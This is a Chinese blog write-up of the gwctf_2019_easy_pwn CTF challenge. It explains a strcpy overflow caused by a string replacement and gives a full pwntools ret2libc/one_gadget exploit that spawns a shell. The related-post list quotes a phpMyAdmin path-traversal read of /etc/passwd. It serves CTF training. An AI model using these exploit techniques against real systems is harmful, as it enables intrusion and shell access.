【pwn】gwctf_2019_easy_pwn

最新推荐文章于 2025-04-20 17:50:51 发布
最新推荐文章于 2025-04-20 17:50:51 发布
阅读量1k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/github_36788573/article/details/103463024
本文分析了一个C++程序的安全漏洞,探讨了在字符串替换过程中导致的缓冲区溢出问题,并通过实例展示了如何利用该漏洞进行PWN攻击,获取程序控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

例行检查
在这里插入图片描述分析程序,这个程序是c++写的。在往s中read的时候大小没有问题,但是程序在下面将字符"I"替换成了"pretty",最后在strcpy的时候发生了溢出,没有PIE和canary直接利用即可。

from pwn import *

io=remote('node3.buuoj.cn','27671')
puts_plt=0x8048DC0
puts_got=0x804C068
main=0x8049091
pl='I'*16+p32(puts_plt)+p32(main)+p32(puts_got)
io.send(pl)
io.recvuntil('pretty'*16)
io.recv(12)
puts_add=u32(io.recv(4))
print(hex(puts_add))
one_gadget=puts_add-0x05f140+0x5f066
#sys=puts_add-0x24800
#sh=puts_add+0xf9eeb
#pl2='I'*16+p32(sys)+'dead'+p32(sh)
pl2='I'*16+p32(one_gadget)
io.send(pl2)

io.interactive()
BUUCTF-MISC-[GWCTF2019]math
zippo1234的博客
10-30 1276
BUUCTF-MISC-[GWCTF2019]math[GWCTF2019]math题目分析开始1.题目2.源程序分析(1)查壳(2)IDA分析3.pwntools4.脚本5.get flag结语 每天一题,只能多不能少 [GWCTF2019]math 题目分析 pwntools交互 recvuntil方法 开始 1.题目 给出一个环境。 环境连接后提示: 给出一个算式,要成功计算150次,每次几秒内没给出结果就退出。 和这个环境的源程序。gwctf_2019_math 2.源程序分析 (1)查壳
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 519
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
gwctf_2019_easy_pwn
z1r0的博客
03-20 739
gwctf_2019_easy_pwn 查看保护 刚打开时没有看懂,只知道pertty加到一个全局变量里了。然后笔者就把ascii码跑了一遍发现I会被换成pretty,再配合后面的strcpy就存在一个溢出漏洞。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 0 if debug: r = remote('node4.buuoj.cn',
BUUCTF [GWCTF 2019]re3题解
最新发布
2401_86123229的博客
04-20 1079
IDA逆向解题
[GWCTF 2019]pyre
苗_的博客
04-07 824
首先进行pyc反编译,拿到py文件: 逻辑比较简单,上脚本: 注意第一次异或需要倒序!run一下就拿到flag了
bjdctf_2020_babyrop
z1r0的博客
12-05 575
bjdctf_2020_babyrop 查看保护 运行之后都说了return from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25811) else: r = process(file_name) elf = ELF(file_name) def
BUUCTF [GWCTF 2019]xxor
liulala987的博客
08-26 1346
文件无壳 拖入IDA shift+F12查看可疑字符串双击进入主函数 F5查看伪c代码主函数通过另一个循环,选取v6数组的前三个元素,对它们进行通过调用sub_400686函数,结果被存储在v7数组的前三个元素中调用sub_400770函数,传入v7数组和用户输入的剩余部分。如果sub_400770的返回值不是1,则输出"NO NO NO~ "并通过exit(0)退出程序。如果验证通过,程序会输出恭喜信息,并提示用户“不要忘记将输入改为十六进制并组合”。我们继续跟进sub_400770函数。
【BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4232
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Buu CTF PWN ciscn_2019_c_1 WriteUp
m0sway的博客
03-03 694
Buu CTF PWN题ciscn_2019_c_1的WriteUp
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 911
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
[GWCTF 2019]babyvm
weixin_52369224的博客
02-10 1510
系统学习vm虚拟机逆向 64位vm的题目 找到主函数 分析sub_CD1函数: sub_B5F代表mov操作,其中 0xE1,0xE2...代表不同的寄存器。 sub_A64是一个异或操作xor。 sub_AC5是一个读取操作并判断他的长度是否等于21 sub_956是空操作nop。 sub_A08 两个数相乘操作mul sub_8F0是一个交换操作swap sub_99c线性运算 该函数是对6010A0操作码内容的执行,一直到0x...
2019火种CTF PWN writeup
qq_43189757的博客
11-23 964
1.lllheap 思路: UAF漏洞,程序限制了chunk的大小为0x80-0x200 之间, 那么无法通过常规的fastbin attack来覆写malloc_hook , 但是可以通过改写global_max_fast 来扩大fastbin 的上限大小, 再往_IO_stdin 附近写入0xf1作为跳板, 伪造fake_chunk从而覆写malloc_hook exp: from pwn i...
pwn】roarctf_2019_easy_pwn
Nothing
12-24 2181
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
(BUUCTF)gwctf_2019_chunk
xy1458214551的博客
12-14 112
BUUCTF的gwctf_2019_chunk题解
BUU[GWCTF 2019]我有一个数据库
qq_62078839的博客
04-26 1869
打开链接 一堆乱码,查看源代码也没什么信息可提取,利用目录扫描器,看能不能扫出什么东西 扫到了一个phpmyadmin 进去看看 这里的版本号为4.8.1,而phpmyadmin在4.8.0以及4.8.1的版本号中有文件包含漏洞 [PHPMYADMIN]CVE-2018-12613 我们试试读取看是否成功 index.php?target=sql.php?/../../../../../../../../../etc/passwd 成功 尝试读取flag inde...
第三十九题——[GWCTF 2019]我有一个数据库
分享简单的安全技术
04-24 380
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,一堆乱码,使用diirsearch获取到了phpmyadmin这个目录 第二步:访问phpadmin目录,查看到了当前版本4.8.1,经查该版本有远程文件包含漏洞,与第一题漏洞一样 第三步:查看漏洞发现需要上传target参数且满足一定要求,构造:phpmyadmin/?target=db_sql.php?/../../../../../../flag获取flag ...
[GWCTF 2019]我有一个数据库
2301_76723924的博客
11-29 399
在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。但是题目提示数据库, 肯定有什么藏起来的东西,F12查看网络请求,看到有捕捉到一个网络请求,注意右下角的phpmyadmin版本是4.8.1,这个版本的phpmyadmin存在一个漏洞。扫出来的结果还是很多429,但是貌似不影响我们扫到应该扫到的关键文件,那就先不管了。访问这个目录,直接就进入了phpmyadmin数据库,并且不需要登陆,尝试用sql语句写shell,点击执行,但是没用,
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值